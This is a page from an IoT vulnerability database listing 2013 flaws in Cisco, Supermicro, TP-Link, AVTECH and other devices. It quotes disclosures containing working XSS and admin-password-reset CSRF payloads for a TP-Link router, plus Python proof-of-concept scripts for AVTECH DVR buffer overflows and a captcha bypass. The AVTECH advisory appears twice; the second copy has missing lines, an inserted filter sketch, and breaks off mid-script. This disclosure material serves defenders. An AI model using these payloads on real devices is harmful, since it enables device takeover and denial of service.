VARIoT IoT vulnerabilities database
| VAR-201309-0590 | No CVE | There are multiple unspecified vulnerabilities in NetGear RAIDiator |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
NetGear RAIDiator is direct-attached storage firmware based on Linux and the debian-sparc platform. There are several security vulnerabilities in NetGear RAIDiator:
1. Multiple unspecified errors in the CIFS service.
2. Multiple unspecified errors in the DLNA service.
3. Multiple unspecified errors in the iTunes service.
4. Multiple unspecified errors in Frontview.
No detailed vulnerability information is currently available.
| VAR-201309-0600 | No CVE | RuggedCom Rugged Operating System Remote Security Bypass Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Rugged Operating System is prone to a security-bypass vulnerability.
An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions.
Versions of Rugged Operating System prior to 3.12.2 are vulnerable.
| VAR-201308-0508 | No CVE | Cogent DataHub Unspecified Arbitrary File Overwrite and Denial Of Service Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
Cogent DataHub is prone to an unspecified arbitrary-file-overwrite vulnerability and multiple unspecified denial-of-service vulnerabilities.
Attackers can leverage these issues to overwrite arbitrary files on the victim's computer in the context of the vulnerable application, or to crash the application that uses the affected library, denying service to legitimate users.
Limited information is currently available regarding this issue. We will update this BID as more information emerges.
Versions prior to Cogent DataHub 7.3.3 are vulnerable.
| VAR-201309-0232 | CVE-2013-3469 | Cisco Mobility service Vulnerability to get unauthorized session in engine |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Mobility Services Engine does not properly set up the Oracle SSL service, which allows remote attackers to obtain an unauthenticated session to the database-replication port, and consequently obtain sensitive information, via an SSL connection, aka Bug ID CSCue50794. Cisco Mobility Services Engine is prone to a security-bypass vulnerability.
Exploiting this issue could allow an attacker to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCue50794. The platform collects, stores and manages data from wireless clients, Cisco access points and controllers. A security bypass vulnerability exists in Cisco MSE due to a misconfigured Oracle SSL server.
| VAR-201308-0219 | CVE-2013-3474 | Cisco Wireless LAN Controller Device Web Service disruption in the administrator interface (DoS) Vulnerabilities |
CVSS V2: 6.3 CVSS V3: - Severity: MEDIUM |
The Web Administrator Interface on Cisco Wireless LAN Controller (WLC) devices allows remote authenticated users to cause a denial of service (device crash) by leveraging membership in the Full Manager managers group, Read Only managers group, or Lobby Ambassador managers group, and sending a request that (1) lacks a parameter value or (2) contains a malformed parameter value, aka Bug IDs CSCuh14313, CSCuh14159, CSCuh14368, and CSCuh14436. The Web Administrator interface that runs on Cisco Wireless LAN Controller (WLC) devices contains a vulnerability that can put the device into a denial-of-service (device crash) state. The Cisco WLC is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. An attacker authenticated with any account in the Full Manager, Read Only, or Lobby Ambassador manager groups submits a request to the affected device; if the request is missing values or contains malformed values for specific parameters, the device reboots. An authenticated remote attacker can therefore exploit this vulnerability to cause a denial of service.
These issues are being tracked by Cisco Bug IDs CSCuh14313, CSCuh14159, CSCuh14368, and CSCuh14436. The vulnerability is caused by the program not properly filtering parameters.
| VAR-201308-0305 | CVE-2013-5469 | Cisco IOS of TCP Service disruption in implementations (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The TCP implementation in Cisco IOS does not properly implement the transitions from the ESTABLISHED state to the CLOSED state, which allows remote attackers to cause a denial of service (flood of ACK packets) via a crafted series of ACK and FIN packets, aka Bug ID CSCtz14399. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This vulnerability stems from an error closing an established TCP connection. Cisco IOS is prone to a remote denial-of-service vulnerability.
Exploiting this issue may allow remote attackers to trigger denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCtz14399.
| VAR-201308-0460 | No CVE | TP-LINK TD-W8951ND Router has multiple input validation vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities that allow an attacker to obtain sensitive information or hijack a user's session:
1. The Referer field is handled incorrectly for non-existent URLs, allowing an unauthenticated attacker to exploit a reflected cross-site scripting vulnerability.
2. The "home_wlan_1" parameters are handled incorrectly, allowing an authenticated attacker to exploit reflected cross-site scripting vulnerabilities.
3. Multiple cross-site request forgery vulnerabilities allow an attacker to construct a malicious URI, entice a logged-in user to open it, and perform malicious operations in the target user's context, such as resetting the administrator password.
Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized operations, and leak or modify sensitive information; other attacks may also be possible. TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923 is vulnerable; other versions may also be affected.
-----------
Author:
-----------
xistence < xistence[at]0x90[.]nl >
-------------------------
Affected products:
-------------------------
Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923
-------------------------
Affected vendors:
-------------------------
TP-Link
http://www.tp-link.com/
----------
Details:
----------
[ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url pages ]
GET /doesnotexist HTTP/1.1
Host: <IP>
Referer: http://pwned"><script>alert("XSS")</script>
Connection: keep-alive
[ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ]
http://<IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://<IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://<IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
[ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1" argument "PingIPAddr" ]
POST /Forms/tools_test_1 HTTP/1.1
Host: <IP>
Referer: http://<IP>/maintenance/tools_test.htm
Authorization: Basic blablabla==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+
[ 0x04 - Reset Admin password CSRF ]
http://<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED
--------------
Timeline:
--------------
2013-05-30 Provided details to TP-Link.
2013-06-01 Response from TP-Link that they will try to fix it.
2013-07-31 No further response, mailed again to ask for status.
2013-08-30 No response, public disclosure
| VAR-201309-0235 | CVE-2013-3607 |
Supermicro IPMI based on ATEN firmware contain multiple vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201308-0403 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in the web interface in the Intelligent Platform Management Interface (IPMI) implementation on Supermicro H8DC*, H8DG*, H8SCM-F, H8SGL-F, H8SM*, X7SP*, X8DT*, X8SI*, X9DAX-*, X9DB*, X9DR*, X9QR*, X9SBAA-F, X9SC*, X9SPU-F, and X9SR* devices allow remote attackers to execute arbitrary code on the Baseboard Management Controller (BMC), as demonstrated by the (1) username or (2) password field in login.cgi. Supermicro IPMI is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code in the context of the device that uses the affected interface. Failed exploit attempts will likely crash the device.
| VAR-201309-0164 | CVE-2013-3608 | Supermicro IPMI based on ATEN firmware contain multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The web interface in the Intelligent Platform Management Interface (IPMI) implementation on Supermicro H8DC*, H8DG*, H8SCM-F, H8SGL-F, H8SM*, X7SP*, X8DT*, X8SI*, X9DAX-*, X9DB*, X9DR*, X9QR*, X9SBAA-F, X9SC*, X9SPU-F, and X9SR* devices allows remote authenticated users to execute arbitrary commands via shell metacharacters, as demonstrated by the IP address field in config_date_time.cgi. Supermicro IPMI Web Interface is prone to an unspecified remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
| VAR-201309-0165 | CVE-2013-3609 | Supermicro IPMI based on ATEN firmware contain multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The web interface in the Intelligent Platform Management Interface (IPMI) implementation on Supermicro H8DC*, H8DG*, H8SCM-F, H8SGL-F, H8SM*, X7SP*, X8DT*, X8SI*, X9DAX-*, X9DB*, X9DR*, X9QR*, X9SBAA-F, X9SC*, X9SPU-F, and X9SR* devices relies on JavaScript code on the client for authorization checks, which allows remote authenticated users to bypass intended access restrictions via a crafted request, related to the PrivilegeCallBack function. Supermicro Intelligent Platform Management Interface (IPMI) implementations based on ATEN firmware contain multiple vulnerabilities in their web management interface. Supermicro IPMI Web Interface is prone to a remote privilege-escalation vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to gain elevated privileges and perform unauthorized actions.
| VAR-201308-0211 | CVE-2013-3463 | Cisco Adaptive Security Appliances Device protocol-inspection Service disruption in functionality (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The protocol-inspection feature on Cisco Adaptive Security Appliances (ASA) devices does not properly implement the idle timeout, which allows remote attackers to cause a denial of service (connection-table exhaustion) via crafted requests that use an inspected protocol, aka Bug ID CSCuh13899. The vendor has confirmed this vulnerability and released it as Bug ID CSCuh13899. A third party could put the device into a denial-of-service (connection-table exhaustion) state via a crafted request using an inspected protocol. Cisco Adaptive Security Appliance is prone to a denial-of-service vulnerability.
A remote attacker may exploit this issue to cause denial-of-service conditions.
This issue is being tracked by Cisco Bug ID CSCuh13899.
| VAR-201308-0214 | CVE-2013-3467 | Cisco UCS Running on any fabric interconnect device CLI Service disruption in components (DoS) Vulnerabilities |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Memory leak in the CLI component on Cisco Unified Computing System (UCS) 6100 Fabric Interconnect devices, in certain situations that lack a SPAN session, allows local users to cause a denial of service (memory consumption and device reset) via a (1) "show monitor session all" or (2) "show monitor session" command, aka Bug ID CSCug20103. Cisco Unified Computing System is prone to multiple local denial-of-service vulnerabilities.
A local attacker can exploit these issues to cause an affected device to reload or become unresponsive, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCug20103. The system integrates network, computing and virtualization resources into one platform by extensively adopting virtualization technology. The vulnerability is caused by memory not being released after the CLI commands are executed when no SPAN session is configured.
| VAR-201308-0216 | CVE-2013-3470 | Cisco IOS XR of RIP Service disruption in the process (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The RIP process in Cisco IOS XR allows remote attackers to cause a denial of service (process crash) via a crafted version-2 RIP packet, aka Bug ID CSCue46731. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture. The RIP process crashes because it does not correctly validate message input, which allows an attacker to send a specially crafted RIP version 2 message.
An attacker can exploit this issue to cause the RIP process to crash on an affected device, resulting in a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCue46731.
| VAR-201308-0007 | CVE-2012-5744 | Cisco Identity Services Engine Software guest portal cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the guest portal in Cisco Identity Services Engine (ISE) Software allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCud11139 and CSCug02904. The vendor has confirmed this vulnerability and released it as Bug IDs CSCud11139 and CSCug02904. Arbitrary web script or HTML may be injected by a third party.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues are being tracked by Cisco Bug IDs CSCud11139 and CSCug02904. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. A remote attacker could exploit these vulnerabilities to inject arbitrary Web script or HTML.
| VAR-201912-1604 | CVE-2013-4982 |
AVTECH AVN801 DVR Vulnerabilities in authentication
Related entries in the VARIoT exploits database: VAR-E-201308-0256 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
AVTECH AVN801 DVR has a security bypass via the administration login captcha. AVTECH AVN801 DVR contains an authentication vulnerability; as a result, information may be obtained or falsified, or the device may be put into a denial-of-service (DoS) state. AVTECH AVN801 is a digital video recorder product. AVTECH AVN801 has a security restriction bypass vulnerability when running firmware version 1017-1003-1009-1003. A remote attacker can completely bypass captcha protection by sending multiple requests with an arbitrary hard-coded captcha code and its matching verification code. AVTECH AVN801 is prone to a security-bypass vulnerability.
Successfully exploiting this issue will allow attackers to bypass certain security restrictions and perform unauthorized actions. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
AVTECH DVR multiple vulnerabilities
1. *Advisory Information*
Title: AVTECH DVR multiple vulnerabilities
Advisory ID: CORE-2013-0726
Advisory URL:
http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: AVTECH Corporation
Release mode: User release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper
Access Control [CWE-284]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982
3. *Vulnerability Description*
Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and
potentially other devices sharing the affected firmware) that could
allow a remote attacker:
1. [CVE-2013-4980] To execute arbitrary code without authentication
by exploiting a buffer overflow in the RTSP packet handler.
2. [CVE-2013-4981] To execute arbitrary code without authentication
by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a
specially crafted HTTP POST request.
3. [CVE-2013-4982] To bypass the captcha of the administration login
console enabling several automated attack vectors.
4. *Vulnerable Packages*
. DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
There was no official answer from AVTECH support team after several
attempts (see [Sec. 8]); contact vendor for further information. Some
mitigation actions may be:
. Do not expose the DVR to internet unless absolutely necessary.
. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests.
. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.
6. *Credits*
[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core
Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were
discovered and researched by Facundo Pantaleo from Core Security
Consulting Team.
7. *Technical Description / Proof of Concept Code*
7.1. *Buffer Overflow in RTSP Packet Handler*
[CVE-2013-4980] The following Python script sends a specially crafted
packet that triggers a buffer overrun condition when handling the RTSP
transaction; no authentication is required. As a result, the device
crashes and it could possibly lead to a remote code execution.
/-----
import socket

HOST = '192.168.1.1'
PORT = 554

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# An oversized URI in the RTSP SETUP request line overruns the handler's buffer
trigger_pkt = "SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"

print "[*] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[*] Response:', repr(data), "\r\n"
s.close()
-----/
7.2. *Buffer Overflow in config.cgi Parameters*
[CVE-2013-4981] The following Python script exploits another buffer
overflow condition; no authentication is required. As a result, the
device crashes and it could possibly lead to a remote code execution.
/-----
import httplib

ip = "192.168.1.1"
conn = httplib.HTTPConnection(ip)
# An overlong Network.SMTP.Receivers value overflows the CGI's buffer; no authentication is needed
conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1")
resp = conn.getresponse()
print resp.read()
-----/
7.3. *CAPTCHA Bypass*
[CVE-2013-4982] The following Python proof of concept sends a wrong
captcha in first place (just to verify that captcha protection is
enabled); then, it sends ten requests with an arbitrary hardcoded
captcha and its matching verification code. As a result, the captcha
protection can be completely bypassed.
/-----
import httplib

ip = "192.168.1.1"

# A wrong captcha code first, to confirm that captcha checking is enabled
print "Performing captcha replay with hardcoded wrong captcha code and verify code..."
conn = httplib.HTTPConnection(ip)
conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1")
resp = conn.getresponse()
print "Reading webpage..."
print resp.read()

# The same captcha/verify_code pair is accepted repeatedly: the server never invalidates it
print "Performing several captcha replays with hardcoded right captcha code and verify code..."
for i in range(1, 10):
    conn = httplib.HTTPConnection(ip)
    conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1")
    resp = conn.getresponse()
    print "Reading webpage..."
    print resp.read()
-----/
8. *Report Timeline*
. 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received.
. 2013-08-12: Core attempts to contact vendor.
. 2013-08-20: Core attempts to contact vendor.
. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'.
9. *References*
[1] http://www.avtech.com.tw.
[2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en.
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/.
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201403-0124 | CVE-2013-4981 |
AVTECH AVN801 DVR Firmware cgi-bin/user/Config.cgi Vulnerable to buffer overflow
Related entries in the VARIoT exploits database: VAR-E-201308-0256 |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Buffer overflow in cgi-bin/user/Config.cgi in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the Network.SMTP.Receivers parameter. AVTECH AVN801 is a digital video recorder product. A buffer overflow vulnerability exists in AVTECH AVN801 '/cgi-bin/user/Config.cgi'. No authentication is required. A remote attacker can exploit the vulnerability to execute arbitrary code through a specially crafted HTTP POST request. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition.
AVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable.
| VAR-201403-0123 | CVE-2013-4980 | AVTECH AVN801 Remote Buffer Overflow Vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201308-0256 |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Buffer overflow in the RTSP Packet Handler in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the URI in an RTSP SETUP request. AVTECH AVN801 is a digital video recorder product. In firmware version 1017-1003-1009-1003, the RTSP message handler has a buffer overflow in its handling of RTSP transactions, and triggering it does not require authentication. A remote attacker can crash the device or achieve remote code execution. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition.
AVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable.
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
AVTECH DVR multiple vulnerabilities
1. *Advisory Information*
Title: AVTECH DVR multiple vulnerabilities
Advisory ID: CORE-2013-0726
Advisory URL:
http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities
Date published: 2013-08-28
Date of last update: 2013-08-28
Vendors contacted: AVTECH Corporation
Release mode: User release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper
Access Control [CWE-284]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982
3. *Vulnerability Description*
Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and
potentially other devices sharing the affected firmware) that could
allow a remote attacker:
1.
2. [CVE-2013-4981] To execute arbitrary code without authentication
by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a
specially crafted HTTP POST request.
3. [CVE-2013-4982] To bypass the captcha of the administration login
console enabling several automated attack vectors.
4. *Vulnerable Packages*
. DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
There was no official answer from the AVTECH support team after several
attempts (see [Sec. 8]); contact the vendor for further information. Some
mitigation actions may be:
. Do not expose the DVR to the internet unless absolutely necessary.
. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests.
. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.
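As an added illustration of the two proxy-filtering mitigations above (this is not code from the advisory, from Core Security or from AVTECH), the following Python 3 sketch of a proxy-side check flags RTSP SETUP requests whose URI is oversized and Config.cgi requests whose Network.SMTP.Receivers value is oversized. The length limits and the sample requests are assumptions constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Size limits are assumptions chosen for illustration, not values from the advisory.
MAX_RTSP_URI_LEN = 256
MAX_SMTP_RECEIVERS_LEN = 128
CONFIG_CGI_PATH = "/cgi-bin/user/Config.cgi"


def check_rtsp_request(raw):
    """Return a finding for an RTSP SETUP request whose URI is oversized, else None."""
    parts = raw.split("\r\n", 1)[0].split(" ")
    if len(parts) < 3 or parts[0] != "SETUP" or not parts[-1].startswith("RTSP/"):
        return None
    if len(parts[1]) > MAX_RTSP_URI_LEN:
        return "RTSP SETUP URI is %d bytes (limit %d)" % (len(parts[1]), MAX_RTSP_URI_LEN)
    return None


def check_http_request(raw):
    """Return a finding for a Config.cgi request whose Network.SMTP.Receivers is oversized, else None."""
    parts = raw.split("\r\n", 1)[0].split(" ")
    if len(parts) < 2:
        return None
    target = urlsplit(parts[1])
    if target.path != CONFIG_CGI_PATH:
        return None
    # parse_qs decodes percent-escapes, so the length checked is what the CGI would receive.
    for value in parse_qs(target.query, keep_blank_values=True).get("Network.SMTP.Receivers", []):
        if len(value) > MAX_SMTP_RECEIVERS_LEN:
            return "Network.SMTP.Receivers is %d bytes (limit %d)" % (len(value), MAX_SMTP_RECEIVERS_LEN)
    return None


def filter_requests(requests):
    """Apply the check matching each request's protocol; return {label: finding} for requests to block."""
    blocked = {}
    for label, proto, raw in requests:
        finding = check_rtsp_request(raw) if proto == "rtsp" else check_http_request(raw)
        if finding:
            blocked[label] = finding
    return blocked


# Constructed sample traffic: benign requests plus two shaped like the advisory's proof-of-concept requests.
SAMPLE_REQUESTS = [
    ("rtsp-ok", "rtsp", "SETUP rtsp://192.0.2.10/live/ch1 RTSP/1.0\r\nCSeq: 1\r\n\r\n"),
    ("rtsp-long", "rtsp", "SETUP " + "A" * 400 + " RTSP/1.0\r\nCSeq: 1\r\n\r\n"),
    ("http-ok", "http", "POST " + CONFIG_CGI_PATH + "?action=set&Network.SMTP.Receivers=ops%40example.test HTTP/1.1\r\n\r\n"),
    ("http-long", "http", "POST " + CONFIG_CGI_PATH + "?action=set&Network.SMTP.Receivers=" + "A" * 800 + " HTTP/1.1\r\n\r\n"),
    ("http-other", "http", "GET /index.html HTTP/1.1\r\n\r\n"),
]
```

Running filter_requests(SAMPLE_REQUESTS) returns findings only for the two oversized requests; everything else passes through.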
6. *Credits*
[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core
Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were
discovered and researched by Facundo Pantaleo from Core Security
Consulting Team.
7. *Technical Description / Proof of Concept Code*
7.1.
/-----
import socket
HOST = '192.168.1.1'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# RTSP SETUP request whose URI is an overlong cyclic pattern (the overflow trigger)
trigger_pkt = "SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"
print "[*] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[*] Response:', repr(data), "\r\n"
s.close()
-----/
7.2. *Buffer Overflow in config.cgi Parameters*
[CVE-2013-4981] The following Python script exploits another buffer
overflow condition; no authentication is required.
/-----
import httplib
ip = "192.168.1.1"
conn = httplib.HTTPConnection(ip)
# POST to Config.cgi with an overlong Network.SMTP.Receivers value (the overflow trigger)
conn.request("POST",
